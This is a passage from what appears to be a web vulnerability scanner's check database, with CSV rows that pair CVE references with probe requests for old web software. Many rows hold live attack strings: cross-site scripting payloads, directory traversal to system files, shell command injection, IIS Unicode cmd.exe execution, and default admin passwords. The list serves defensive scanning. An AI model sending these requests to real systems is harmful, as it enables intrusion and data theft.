code.\",\"\",\"\"\n\"003082\",\"CVE-2002-0568\",\"3\",\"/XSQLConfig.xml\",\"GET\",\"CODE:200\",\"Oracle 9iAS configuration file found.\",\"\",\"\"\n\"003083\",\"CVE-2002-0375\",\"4\",\"/sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003084\",\"CVE-2003-0801\",\"3\",\"/docs/<script>alert('Vulnerable');</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\);<\\/script>\",\"Nokia Electronic Documentation is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003085\",\"CVE-2003-0802\",\"3\",\"/docs/NED?action=retrieve&location=.\",\"GET\",\"BODY:docs\\\\ned\",\"Nokia Electronic Documentation allows directory listings and reveals its installation path.\",\"\",\"\"\n\"003086\",\"CVE-2001-1212\",\"4\",\"/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003087\",\"CVE-2001-1233\",\"d\",\"/lcgi/ndsobj.nlm\",\"GET\",\"BODY:SCRIPT_NAME\",\"Novell Netware 5.1 contains a buffer overflow, also, if Groupwise is enabled remote enumeration of users, groups and system information might be possible.\",\"\",\"\"\n\"003088\",\"CVE-2002-0705\",\"3\",\"/surf/scwebusers\",\"GET\",\"CODE:200\",\"SurfControl SuperScout Web Reports Server user and password file is available.\",\"\",\"\"\n\"003089\",\"CVE-1999-1376\",\"8\",\"/_vti_bin/fpcount.exe\",\"GET\",\"BODY:specified CGI application misbehaved\",\"Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed.\",\"\",\"\"\n\"003090\",\"CVE-1999-1052\",\"3\",\"/_private/form_results.htm\",\"GET\",\"CODE:200&&!BODY:cannot be displayed\",\"This file may contain information submitted by other web users via forms.\",\"\",\"\"\n\"003091\",\"CVE-1999-1052\",\"3\",\"/_private/form_results.html\",\"GET\",\"CODE:200&&!BODY:cannot be displayed\",\"This file may contain information submitted by other web users via forms.\",\"\",\"\"\n\"003092\",\"CVE-1999-1052\",\"3\",\"/_private/form_results.txt\",\"GET\",\"CODE:200&&!BODY:cannot be displayed\",\"This file may contain information submitted by other web users via forms.\",\"\",\"\"\n\"003093\",\"http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc\",\"7\",\"/scripts/tools/getdrvrs.exe\",\"GET\",\"CODE:200\",\"MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution.\",\"\",\"\"\n\"003094\",\"OSVDB-3513\",\"7\",\"@CGIDIRSwebbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20@LFI(abs,nix)\",\"GET\",\"@LFI()\",\"WebBBS by Darryl Burgdorf is vulnerable to command execution.\",\"\",\"\"\n\"003095\",\"CVE-2002-1628\",\"7\",\"@CGIDIRSvote.cgi\",\"GET\",\"CODE:200\",\"Mike's Vote CGI contains a bug which allows arbitrary command execution (version 1.2).\",\"\",\"\"\n\"003096\",\"OSVDB-3515\",\"7\",\"@CGIDIRSquizme.cgi\",\"GET\",\"CODE:200\",\"Mike's Quiz Me! CGI contains a bug which allows arbitrary command execution (version 0.5).\",\"\",\"\"\n\"003097\",\"CVE-2002-0240\",\"3\",\"/\",\"OPTIONS\",\"BODY:not found for:\",\"By sending an OPTIONS request for /, the physical path to PHP can be revealed.\",\"\",\"\"\n\"003098\",\"CVE-2003-0243\",\"7\",\"/shop/normal_html.cgi?file=../../../../../../etc/issue%00\",\"GET\",\"@LFI()\",\"Happymail E-Commerce 4.3/4.4 allows arbitrary files to be retrieved remotely.\",\"\",\"\"\n\"003099\",\"CVE-2003-0243\",\"7\",\"/shop/normal_html.cgi?file=;cat%20@LFI(abs,nix)|\",\"GET\",\"@LFI()\",\"Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely.\",\"\",\"\"\n\"003103\",\"CVE-2002-0710\",\"7\",\"@CGIDIRSsendform.cgi\",\"GET\",\"CODE:200\",\"This CGI by Rod Clark (v1.4.4 and below) may allow arbitrary file reading via email or allow spam to be sent.\",\"\",\"\"\n\"003104\",\"CVE-2002-0503\",\"7\",\"/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../Windows/win.ini&NFuse_CurrentFolder=/\",\"GET\",\"@LFI()\",\"Citrix CGI allows directory traversal.\",\"\",\"\"\n\"003105\",\"CVE-2000-1209\",\"2\",\"/proxy/ssllogin?user=administrator&password=administrator\",\"GET\",\"BODY:>administrator<\",\"Compaq Web-Based Management allows login with ID/pass 'administrator'/'administrator'.\",\"\",\"\"\n\"003106\",\"CVE-2000-1209\",\"2\",\"/proxy/ssllogin?user=administrator&password=operator\",\"GET\",\"BODY:>operator<\",\"Compaq Web-Based Management allows login with ID/pass 'operator'/'operator'.\",\"\",\"\"\n\"003107\",\"CVE-2000-1209\",\"2\",\"/proxy/ssllogin?user=administrator&password=user\",\"GET\",\"BODY:>user<\",\"Compaq Web-Based Management allows login with ID/pass 'user'/'user'.\",\"\",\"\"\n\"003108\",\"CVE-2002-0612\",\"7\",\"@CGIDIRSFileSeek.cgi?head=&foot=;cat%20@LFI(nix,abs)\",\"GET\",\"@LFI()\",\"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003109\",\"CVE-2002-0612\",\"7\",\"@CGIDIRSFileSeek.cgi?head=;cat%20@LFI(nix,abs)d|&foot=\",\"GET\",\"@LFI()\",\"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003110\",\"OSVDB-3588\",\"7\",\"@CGIDIRSFileSeek2.cgi?head=&foot=;cat%20@LFI(nix,abs)\",\"GET\",\"@LFI()\",\"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003111\",\"OSVDB-3588\",\"7\",\"@CGIDIRSFileSeek2.cgi?head=;cat%20@LFI(nix,abs)|&foot=\",\"GET\",\"@LFI()\",\"FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003112\",\"CVE-2002-0611\",\"7\",\"@CGIDIRSFileSeek.cgi?head=&foot=....//....//....//....//....//....//..../@LFI(nix,abs)\",\"GET\",\"@LFI()\",\"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003113\",\"CVE-2002-0611\",\"7\",\"@CGIDIRSFileSeek.cgi?head=....//....//....//....//....//....//..../@LFI(nix,abs)&foot=\",\"GET\",\"@LFI()\",\"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003114\",\"OSVDB-3590\",\"7\",\"@CGIDIRSFileSeek2.cgi?head=&foot=....//....//....//....//....//....//..../@LFI(nix,abs)\",\"GET\",\"@LFI()\",\"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003115\",\"OSVDB-3590\",\"7\",\"@CGIDIRSFileSeek2.cgi?head=....//....//....//....//....//....//..../@LFI(nix,abs)&foot=\",\"GET\",\"@LFI()\",\"FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com\",\"\",\"\"\n\"003116\",\"CVE-2002-1428\",\"b\",\"/project/index.php?m=projects&user_cookie=1\",\"GET\",\"CODE:200\",\"dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.\",\"\",\"\"\n\"003117\",\"OSVDB-3632\",\"4\",\"/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003118\",\"OSVDB-3633\",\"4\",\"/webcalendar/week.php?user=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003119\",\"CVE-2000-0642\",\"3\",\"/active.log\",\"GET\",\"BODY:WEBactive Http Server\",\"The WebActive log is accessible remotely.\",\"\",\"\"\n\"003120\",\"OSVDB-3761\",\"7\",\"/?pattern=/etc/*&sort=name\",\"GET\",\"BODY:passwd&&BODY:hosts\",\"The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.\",\"\",\"\"\n\"003121\",\"OSVDB-3761\",\"7\",\"/images/?pattern=/etc/*&sort=name\",\"GET\",\"BODY:passwd&&BODY:hosts\",\"The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.\",\"\",\"\"\n\"003122\",\"OSVDB-3762\",\"4\",\"/debug/dbg?host==<script>alert('Vulnerable');</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\);<\\/script>\",\"The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.\",\"\",\"\"\n\"003123\",\"OSVDB-3762\",\"4\",\"/debug/echo?name=<script>alert('Vulnerable');</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\);<\\/script>\",\"The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.\",\"\",\"\"\n\"003124\",\"OSVDB-3762\",\"4\",\"/debug/errorInfo?title===<script>alert('Vulnerable');</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\);<\\/script>\",\"The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.\",\"\",\"\"\n\"003125\",\"OSVDB-3762\",\"4\",\"/debug/showproc?proc===<script>alert('Vulnerable');</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\);<\\/script>\",\"The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.\",\"\",\"\"\n\"003126\",\"CVE-2000-0628\",\"8\",\"/site/eg/source.asp\",\"GET\",\"CODE:200\",\"This ASP (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher.\",\"\",\"\"\n\"003127\",\"CVE-2004-0129\",\"7\",\"@PHPMYADMINexport.php?what=@LFI()%00\",\"GET\",\"@LFI()\",\"phpMyAdmin is vulnerable to a directory traversal attack.\",\"\",\"\"\n\"003128\",\"http://httpd.apache.org/docs/2.4/mod/mod_userdir.html\",\"2\",\"/~nobody@LFI(nix,abs)\",\"GET\",\"@LFI()\",\"Apache is misconfigured to view files by accessing ~nobody/filename. Change UserDir from './' to something else in httpd.conf.\",\"\",\"\"\n\"003129\",\"https://seclists.org/bugtraq/2003/Jul/39\",\"3\",\"/admin/db.php\",\"POST\",\"BODY:e107 sql\\-dump\",\"The e107 Website Management System allows the remote SQL database to be dumped to the user, and it may contained hashed passwords..\",\"dump_sql=foo\",\"\"\n\"003130\",\"https://seclists.org/bugtraq/2003/Jul/39\",\"3\",\"/admin/db.php?dump_sql=1\",\"GET\",\"BODY:e107 sql\\-dump\",\"e107 allows a dump of the MySQL database without authentication.\",\"\",\"\"\n\"003131\",\"CVE-2001-0437\",\"7\",\"/dcforum/dcforum.cgi?az=list&forum=@LFI()%00\",\"GET\",\"@LFI()\",\"This install of DCForum allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"003132\",\"CVE-2001-0437\",\"7\",\"@CGIDIRSdcforum.cgi?az=list&forum=@LFI()%00\",\"GET\",\"@LFI()\",\"This install of DCForum allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"003133\",\"CVE-2000-0664\",\"3\",\"/%00/\",\"GET\",\"BODY:Directory listing of&&HEADER:.*Roxen\\/\",\"Remote directories can be retrieved through Roxen, upgrade the server.\",\"\",\"\"\n\"003134\",\"CVE-1999-0449\",\"6\",\"/iissamples/exair/search/advsearch.asp\",\"GET\",\"CODE:200\",\"Scripts within the Exair package on IIS 4 can be used for a DoS against the server.\",\"\",\"\"\n\"003135\",\"CVE-2002-1264\",\"2bd\",\"/isqlplus\",\"GET\",\"CODE:200\",\"Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user ID field.\",\"\",\"\"\n\"003136\",\"CVE-2002-2057\",\"2\",\"/data/member_log.txt\",\"GET\",\"CODE:200\",\"Teekai's forum full 1.2 member's log can be retrieved remotely.\",\"\",\"\"\n\"003137\",\"CVE-2002-2058\",\"2\",\"/data/userlog/log.txt\",\"GET\",\"CODE:200\",\"Teekai's Tracking Online 1.0 log can be retrieved remotely.\",\"\",\"\"\n\"003138\",\"CVE-2002-2058\",\"2\",\"/userlog.php\",\"GET\",\"CODE:200\",\"Teekai's Tracking Online 1.0 log can be retrieved remotely.\",\"\",\"\"\n\"003139\",\"CVE-2003-0312\",\"7\",\"/internal.sws?../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.\",\"\",\"\"\n\"003142\",\"CVE-2003-0313\",\"7\",\"/internal.sws?.../.../.../.../.../.../.../.../Windows/win.ini\",\"GET\",\"@LFI()\",\"Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.\",\"\",\"\"\n\"003143\",\"CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"2\",\"/ASP/cart/database/metacart.mdb\",\"GET\",\"CODE:200\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003144\",\"CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"2\",\"/database/metacart.mdb\",\"GET\",\"CODE:200\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003145\",\"CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"2\",\"/mcartfree/database/metacart.mdb\",\"GET\",\"CODE:200\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003146\",\"CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"2\",\"/metacart/database/metacart.mdb\",\"GET\",\"CODE:200\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003147\",\"CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"2\",\"/shop/database/metacart.mdb\",\"GET\",\"CODE:200\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003148\",\"CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"2\",\"/shoponline/fpdb/shop.mdb\",\"GET\",\"CODE:200\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003149\",\"CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"2\",\"/shopping/database/metacart.mdb\",\"GET\",\"CODE:200\",\"MetaCart2 is an ASP shopping cart. The database of customers is available via the web.\",\"\",\"\"\n\"003150\",\"http://phpay.sourceforge.net/ https://seclists.org/bugtraq/2003/Apr/138\",\"4\",\"/search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"BODY:<script>alert\\(document\\.cookie\\)<\\/script>\",\"phPay v2.02 cross site scripting.\",\"\",\"\"\n\"003151\",\"https://vulners.com/osvdb/OSVDB:35877\",\"3\",\"/admin/phpinfo.php\",\"GET\",\"BODY:PHP Version\",\"Immobilier allows phpinfo() to be run.\",\"\",\"\"\n\"003152\",\"http://phpay.sourceforge.net/ https://seclists.org/bugtraq/2003/Apr/138\",\"3\",\"/start.php?config=alper.inc.php\",\"GET\",\"BODY:Failed opening required\",\"phPay v2.02 information disclosure.\",\"\",\"\"\n\"003153\",\"https://seclists.org/bugtraq/2003/Apr/138\",\"3\",\"/login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang\",\"GET\",\"BODY:Failed opening required\",\"phPay v2.02 information disclosure.\",\"\",\"\"\n\"003154\",\"https://seclists.org/fulldisclosure/2004/Nov/1116\",\"7\",\"/viewimg.php?path=@LFI()&form=1&var=1\",\"GET\",\"@LFI()\",\"KorWebLog allows any file to be read on the system.\",\"\",\"\"\n\"003155\",\"CVE-2002-0360\",\"d\",\"@CGIDIRSgettransbitmap\",\"GET\",\"CODE:200\",\"Sun Answerbook2 is vulnerable to a buffer overflow in the gettransbitmap CGI. All default CGIs should be disabled or removed, and Answerbook2 should be disabled if not being used.\",\"\",\"\"\n\"003156\",\"CVE-2003-1425\",\"8\",\"@CGIDIRSguestbook.cgi?user=cpanel&template=|/bin/cat%20@LFI(nix,abs)|\",\"GET\",\"@LFI()\",\"cpanel's guestbook.cgi allows any command to be executed on the remote server. Remove /usr/local/cpanel/cgi-sys/guestbook.cgi or update to a new version of cpanel.\",\"\",\"\"\n\"003157\",\"https://www.cirt.net/Apache%20Cocoon%20Path%20Disclosure\",\"3\",\"/@JUNK(5).xml\",\"GET\",\"BODY:file:&&!BODY:file:hover\",\"Coccoon from Apache-XML project reveals file system path in error messages.\",\"\",\"\"\n\"003158\",\"https://www.cirt.net/Apache%20Cocoon%20Path%20Disclosure\",\"3\",\"/@JUNK(5)/\",\"GET\",\"BODY:FileNotFoundException: \\/\",\"Coccoon 2.1.4 from Apache-XML project reveals file system path in error messages.\",\"\",\"\"\n\"003159\",\"https://www.niksun.com/netdetector.php\",\"1\",\"/cgi-bin/main_menu.pl\",\"GET\",\"BODY:NetDetector Traffic Analysis\",\"The NetDetector allows unauthenticated users to perform database queries.\",\"\",\"\"\n\"003160\",\"CVE-2002-2342\",\"2\",\"/ban.bak\",\"GET\",\"CODE:200\",\"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.\",\"\",\"\"\n\"003161\",\"CVE-2002-2342\",\"2\",\"/ban.dat\",\"GET\",\"CODE:200\",\"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.\",\"\",\"\"\n\"003162\",\"CVE-2002-2342\",\"2\",\"/ban.log\",\"GET\",\"CODE:200\",\"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.\",\"\",\"\"\n\"003163\",\"CVE-2002-2342\",\"2\",\"/banmat.pwd\",\"GET\",\"CODE:200\",\"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.\",\"\",\"\"\n\"003164\",\"CVE-2002-0579\",\"2\",\"/admin/adminproc.asp\",\"GET\",\"CODE:200\",\"Xpede administration page may be available. The /admin directory should be protected.\",\"\",\"\"\n\"003165\",\"CVE-2002-0579\",\"2\",\"/admin/datasource.asp\",\"GET\",\"CODE:200\",\"Xpede page reveals SQL account name. The /admin directory should be protected.\",\"\",\"\"\n\"003166\",\"CVE-2002-0579\",\"9\",\"/utils/sprc.asp\",\"GET\",\"CODE:200\",\"Xpede page may allow SQL injection.\",\"\",\"\"\n\"003167\",\"CVE-2002-0579\",\"2\",\"/reports/temp/\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Xpede reports directory should not be browsable.\",\"\",\"\"\n\"003168\",\"OSVDB-4245\",\"3\",\"@CGIDIRSrtm.log\",\"GET\",\"BODY:HttpPost Retry\",\"Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information.\",\"\",\"\"\n\"003169\",\"CVE-2002-0236\",\"3\",\"@CGIDIRSVsSetCookie.exe?\",\"GET\",\"CODE:200\",\"A flaw in VsSetCookie.exe may allow attackers to guess a correct user name & gain access to the Lucent system.\",\"\",\"\"\n\"003170\",\"CVE-2002-1131\",\"4\",\"/addressbook.php?\\\"><script>alert(Vulnerable)</script><!--\",\"GET\",\"BODY:<script>alert\\(Vulnerable\\)<\\/script>\",\"Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003171\",\"CVE-2002-1131\",\"4\",\"/options.php?optpage=<script>alert('Vulnerable!')</script>\",\"GET\",\"BODY:include_path\",\"This Squirrel Mail 1.2.7 reveals the PHP path information in error messages.\",\"\",\"\"\n\"003172\",\"CVE-2002-1131\",\"4\",\"/search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search\",\"GET\",\"BODY:include_path\",\"This Squirrel Mail 1.2.7 reveals the PHP path information in error messages.\",\"\",\"\"\n\"003173\",\"CVE-2002-1131\",\"4\",\"/help.php?chapter=<script>alert('Vulnerable')</script>\",\"GET\",\"BODY:<script>alert\\('Vulnerable'\\)<\\/script>\",\"Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003174\",\"CVE-2002-1341\",\"4\",\"/src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0\",\"GET\",\"BODY:<script>alert\\(Vulnerable\\)<\\/script>\",\"Squirrel Mail is vulnerable to Cross Site Scripting (XSS).\",\"\",\"\"\n\"003175\",\"CVE-2001-1138\",\"7\",\"@CGIDIRSpowerup/r.cgi?FILE=@LFI()\",\"GET\",\"@LFI()\",\"The Powerup CGI allows attackers to read any file on the system.\",\"\",\"\"\n\"003176\",\"CVE-2001-1138\",\"7\",\"@CGIDIRSr.cgi?FILE=@LFI()\",\"GET\",\"@LFI()\",\"The Powerup CGI allows attackers to read any file on the system.\",\"\",\"\"\n\"003177\",\"https://seclists.org/bugtraq/2002/Feb/250\",\"d\",\"@CGIDIRSWebnews.exe\",\"GET\",\"CODE:200\",\"Some versions of WebNews are vulnerable to a buffer overflow.\",\"\",\"\"\n\"003178\",\"CVE-2002-0310\",\"a\",\"@CGIDIRSwebnews.pl\",\"GET\",\"CODE:200\",\"WebNews may contain some default users in the binary: testweb/newstest, alwn3845/imaptest, alwi3845/wtest3452, testweb2/wtest4879\",\"\",\"\"\n\"003179\",\"CVE-2001-1144\",\"7\",\"/.../.../.../\",\"GET\",\"BODY:Last Modified\",\"The myCIO server allows directory traversal.\",\"\",\"\"\n\"003180\",\"CVE-2002-0266\",\"3\",\"@CGIDIRStexis.exe/(3)\",\"GET\",\"BODY:Web Script\",\"Texis Web Script gives system path/information when an invalid file is requested.\",\"\",\"\"\n\"003181\",\"CVE-2002-0266\",\"3\",\"@CGIDIRStexis/@JUNK(3)\",\"GET\",\"BODY:Web Script\",\"Texis Web Script gives system path/information when an invalid file is requested.\",\"\",\"\"\n\"003182\",\"OSVDB-4314\",\"3\",\"/texis.exe/?-dump\",\"GET\",\"CODE:200\",\"Texis installation may reveal sensitive information.\",\"\",\"\"\n\"003183\",\"OSVDB-4314\",\"3\",\"/texis.exe/?-version\",\"GET\",\"CODE:200\",\"Texis installation may reveal sensitive information.\",\"\",\"\"\n\"003184\",\"CVE-2000-0975\",\"7\",\"@CGIDIRSapexec.pl?etype=odp&template=@LFI()%00.html&passurl=/category/\",\"GET\",\"@LFI()\",\"Anaconda Foundation Directory allows attackers to read arbitrary files from the server.\",\"\",\"\"\n\"003185\",\"OSVDB-4356\",\"4\",\"/acart2_0/deliver.asp?msg=<script>alert(\\\"test\\\")</script>\",\"GET\",\"BODY:<script>alert\\(\\\"test\\\"\\)<\\/script>\",\"Alan Ward A-Cart 2.0 contains several XSS vulnerabilities\",\"\",\"\"\n\"003186\",\"OSVDB-4357\",\"4\",\"/acart2_0/error.asp?msg=<script>alert(\\\"test\\\")</script>\",\"GET\",\"BODY:<script>alert\\(\\\"test\\\"\\)<\\/script>\",\"Alan Ward A-Cart 2.0 contains several XSS vulnerabilities\",\"\",\"\"\n\"003187\",\"OSVDB-4358\",\"4\",\"/acart2_0/admin/error.asp?msg=<script>alert(\\\"test\\\")</script>\",\"GET\",\"BODY:<script>alert\\(\\\"test\\\"\\)<\\/script>\",\"Alan Ward A-Cart 2.0 contains several XSS vulnerabilities\",\"\",\"\"\n\"003188\",\"OSVDB-4359\",\"4\",\"/acart2_0/admin/index.asp?msg=<script>alert(\\\"test\\\")</script>\",\"GET\",\"BODY:<script>alert\\(\\\"test\\\"\\)<\\/script>\",\"Alan Ward A-Cart 2.0 contains several XSS vulnerabilities\",\"\",\"\"\n\"003189\",\"CVE-2000-0884 MS00-078\",\"7\",\"@CGIDIRSsensepost.exe?/c+dir\",\"GET\",\"CODE:200\",\"The presence of sensepost.exe indicates the system is/was vulnerable to a Unicode flaw and was compromised with a test script from SensePost. The sensepost.exe allows command execution (it is a copy of cmd.exe), as did the original unicode exploit.\",\"\",\"\"\n\"003190\",\"CVE-2000-0884 MS00-078\",\"8\",\"/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS Unicode command exec\",\"\",\"\"\n\"003191\",\"CVE-2000-0884 MS00-078\",\"8\",\"/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS Unicode command exec\",\"\",\"\"\n\"003192\",\"CVE-2000-0884 MS00-078\",\"8\",\"/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS Unicode command exec\",\"\",\"\"\n\"003193\",\"CVE-2000-0884 MS00-078\",\"8\",\"/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS Unicode command exec\",\"\",\"\"\n\"003194\",\"CVE-2000-0884 MS00-078\",\"8\",\"/pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS Unicode command exec\",\"\",\"\"\n\"003195\",\"CVE-2000-0884 MS00-078\",\"8\",\"/rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS Unicode command exec\",\"\",\"\"\n\"003196\",\"CVE-2000-0884 MS00-078\",\"8\",\"/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS Unicode command exec\",\"\",\"\"\n\"003197\",\"CVE-2000-0884 MS00-078\",\"8\",\"/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS Unicode command exec\",\"\",\"\"\n\"003198\",\"CVE-2000-0884 MS00-078\",\"8\",\"/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\\\"\",\"GET\",\"BODY:boot\\.ini\",\"IIS Unicode command exec\",\"\",\"\"\n\"003199\",\"CVE-2000-0884 MS00-078\",\"8\",\"/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir\",\"GET\",\"BODY:<DIR>\",\"IIS Unicode command exec\",\"\",\"\"\n\"003200\",\"CVE-2006-2948\",\"2\",\"/acart2_0/acart2_0.mdb\",\"GET\",\"CODE:200\",\"Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.\",\"\",\"\"\n\"003201\",\"CVE-2004-1873\",\"2\",\"/acart2_0/admin/category.asp?catcode='\",\"GET\",\"CODE:200\",\"Alan Ward A-Cart 2.0 is vulnerable to a SQL inject attack.\",\"\",\"\"\n\"003202\",\"CVE-1999-0737,MS99-013\",\"7\",\"/Sites/Knowledge/Membership/Inspired/ViewCode.asp\",\"GET\",\"CODE:200\",\"The default ViewCode.asp can allow an attacker to read any file on the machine.\",\"\",\"\"\n\"003203\",\"CVE-1999-0737,MS99-013\",\"7\",\"/Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp\",\"GET\",\"CODE:200\",\"The default ViewCode.asp can allow an attacker to read any file on the machine.\",\"\",\"\"\n\"003204\",\"CVE-1999-0737,MS99-013\",\"7\",\"/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp\",\"GET\",\"CODE:200\",\"The default ViewCode.asp can allow an attacker to read any file on the machine.\",\"\",\"\"\n\"003205\",\"CVE-1999-0737,MS99-013\",\"7\",\"/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp\",\"GET\",\"CODE:200\",\"The default ViewCode.asp can allow an attacker to read any file on the machine.\",\"\",\"\"\n\"003206\",\"CVE-1999-0737,MS99-013\",\"7\",\"/Sites/Samples/Knowledge/Push/ViewCode.asp\",\"GET\",\"CODE:200\",\"The default ViewCode.asp can allow an attacker to read any file on the machine.\",\"\",\"\"\n\"003207\",\"CVE-1999-0737,MS99-013\",\"7\",\"/Sites/Samples/Knowledge/Search/ViewCode.asp\",\"GET\",\"CODE:200\",\"The default ViewCode.asp can allow an attacker to read any file on the machine.\",\"\",\"\"\n\"003208\",\"CVE-1999-0737,MS99-013\",\"7\",\"/SiteServer/Publishing/ViewCode.asp\",\"GET\",\"CODE:200\",\"The default ViewCode.asp can allow an attacker to read any file on the machine.\",\"\",\"\"\n\"003209\",\"OSVDB-17671\",\"37\",\"/siteserver/publishing/viewcode.asp?source=/default.asp\",\"GET\",\"CODE:200\",\"May be able to view source code using Site Server vulnerability.\",\"\",\"\"\n\"003210\",\"OSVDB-4775\",\"7\",\"/shoutbox.php?conf=@LFI()\",\"GET\",\"@LFI()\",\"Webfroot Shoutbox 2.32 and below allows any file to be read from the system.\",\"\",\"\"\n\"003211\",\"CVE-2002-0385\",\"d\",\"/securelogin/1,2345,A,00.html\",\"GET\",\"CODE:200\",\"Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer 